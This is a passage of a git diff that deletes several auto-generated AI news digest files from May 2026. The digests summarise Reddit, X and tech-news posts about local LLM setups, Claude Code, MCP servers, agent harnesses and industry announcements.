cases?](https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.54 -Tags: api_update, cli_tool - -> So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current 
usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita… - ---- - -## [LLM's on Android (Snapdragon 8 Elite) MOE Experience](https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: developer_tool - -> So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\_XS and MXFP4\_MOE since with what I have tested MXFP4\_MOE is quite faster but for the size IQ4\_XS can't be beaten. Q4\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). 
Goes without saying but Q4\_K\_M is also quite reliable from a speed/quality/size s… - ---- - -## [While waiting for Fara-1.5 for my coding harness](https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: agent_tool - -> Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled "skills" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le… - ---- - -## [Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4](https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: agent_tool - -> CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\_0 to mitigate some weird behavior I was seeing at lower quants. 
Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: "${ik-llama-cuda}/bin/llama-server" + " -m ${modelPath}" + " --host 0.0.0.0" + " --port ${toString cfg.port}" + " -c ${toString cfg.contextLength}" + " -ngl 999" + " --cpu-moe" + " -sm graph" + " -fa on" + " -t 16" + " -tb 16" + " -b 4096" + " -ub 4096" + " -np 1" + " -muge" + " -ger" + " --jinja" + " --metrics" + " --temp 1.0" + " --top-p 0.95" + " --top-k 40" + " --min-p 0.01" - ---- - diff --git a/data/digest-2026-05-18.md b/data/digest-2026-05-18.md deleted file mode 100644 index cdc188c..0000000 --- a/data/digest-2026-05-18.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-18** | 15 stories | Auto-generated from 665 archived stories - ---- - -## [obsidian-mcp-server: v3.2.0 Released](https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 1.00 -Tags: api_update, mcp, product_launch, developer_tool - -> [obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on 
`obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues! - ---- - -## [Witchcraft, fast local semantic search on top of SQLite [P]](https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/) -*Reddit r/MachineLearning* | 18/05/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> **Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered "what was that conversation where I fixed the auth middleware?" — pickbrain finds it, and lets you resume the session directly. 
There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all… - ---- - -## [I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time](https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.86 -Tags: open_source, developer_tool, cli_tool - -> Hey everyone! Running Claude Code in the terminal is amazing, but I hated the "black box" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \*\*Argus\*\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \* \*\*Real-time Timeline:\*\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \* \*\*Dependency Graph:\*\* Visually maps out which files the agent is touching and how they connect. \* \*\*Cost & Loop Detection:\*\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus) - ---- - -## [Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo](https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. 
Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :) - ---- - -## [OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…](https://x.com/NanoGPTcom/status/2056425379171058008) -*X search / AI model updates* | 18/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to "flex" or - ---- - -## [Tried every Hermes Agent alternative so you don't have to (2026 roundup)](https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. 
Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \~4000 lines of Python you can actual… - ---- - -## [Configuration Qwen3.6-35b-a3b (12Gb VRAM)](https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\_K\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\_K\_M for this setup? For example, would Q4\_K\_M, Q6\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality? - ---- - -## [Qwen 35b a3b surprises me](https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. 
I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode). - ---- - -## [xAI Launches Grok Build — Three-Way Coding War Is Now Open](https://x.com/Business_AI/status/2056374805163856261) -*Aligned News (Scoble)* | 18/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI. - ---- - -## [New models when? Forecasting release date.](https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about "open weights" - ---- - -## [Cutoff dates of open source models](https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. 
of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think - ---- - -## [Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models](https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \--- EDIT: Updated model list based on this thread's feedback... \[Original post body\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. 
\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c… - ---- - -## [memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client](https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.94 -Tags: mcp, tool_update - -> memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install "memvee[mcp]" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url="memory.db", default_user_id="alice", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport="streamable-http") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:… - ---- - -## [Every Markdown File You Write for AI is Already Lying to It](https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.70 -Tags: api_update, developer_tool - -> CLAUDE.md files. System prompts. 
README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. "Check package.json if this is stale." "Verify before running." "New packages may have been added since this was written." The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for… - ---- - -## [Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…](https://x.com/Shruti_0810/status/2056266132592468126) -*X / @shruti_0810* | 18/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. 
It scans your entire project and automatically recommends: → MCP servers → - ---- - diff --git a/data/digest-2026-05-19.md b/data/digest-2026-05-19.md deleted file mode 100644 index ac18857..0000000 --- a/data/digest-2026-05-19.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-19** | 15 stories | Auto-generated from 634 archived stories - ---- - -## [Google launches Antigravity 2.0 with an updated desktop app and CLI tool](https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch, cli_tool, tool_update - ---- - -## [Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.](https://www.digg.com/ai/9p5cqkyn?rank=2) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [Anthropic just bought the company that generates most production MCP servers](https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. 
What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo… - ---- - -## [favorite Agentic Coding Harness](https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool, agent_tool - -> So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours? - ---- - -## [Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…](https://x.com/AlternativeTo/status/2056637498978398395) -*X / @alternativeto* | 19/05/2026 | Score: 0.86 -Tags: mcp, cli_tool, tool_update - -> Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. 
AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ … - ---- - -## [Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration](https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch, tool_update - ---- - -## [Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.](https://www.digg.com/ai/r5p7scr1?rank=3) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?](https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows? 
- ---- - -## [OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over](https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k… - ---- - -## [Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates](https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). 
Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\_0). Test rig: RTX 3060 Laptop 6GB, \~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\_ctx on this GPU is… - ---- - -## [bytedance released an open source model that attempts to do just about anything with only 3b parameters](https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget. 
- ---- - -## [How I built a 9-agent team where my agents actually talk to each other](https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: "senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br… - ---- - -## [We have sub-agents at home](https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. 
Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \`--slot-save-path\` and the \`s… - ---- - -## [Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)](https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/) -*Reddit r/ChatGPT* | 19/05/2026 | Score: 0.86 -Tags: cli_tool, tool_update - -> Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. 
We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t… - ---- - -## [Centralize SKILLs](https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 0.86 -Tags: open_source, agent_tool - -> We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this? 
- ---- - diff --git a/data/digest-2026-05-20.md b/data/digest-2026-05-20.md deleted file mode 100644 index 152b39f..0000000 --- a/data/digest-2026-05-20.md +++ /dev/null @@ -1,107 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-20** | 15 stories | Auto-generated from 630 archived stories - ---- - -## [Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments](https://www.digg.com/ai/xizlma81) -*Digg AI* | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - ---- - -## [Put your spare Claude cycles on night shift: help review open-source packages](https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/) -*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.94 -Tags: open_source, developer_tool, cli_tool - -> Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it 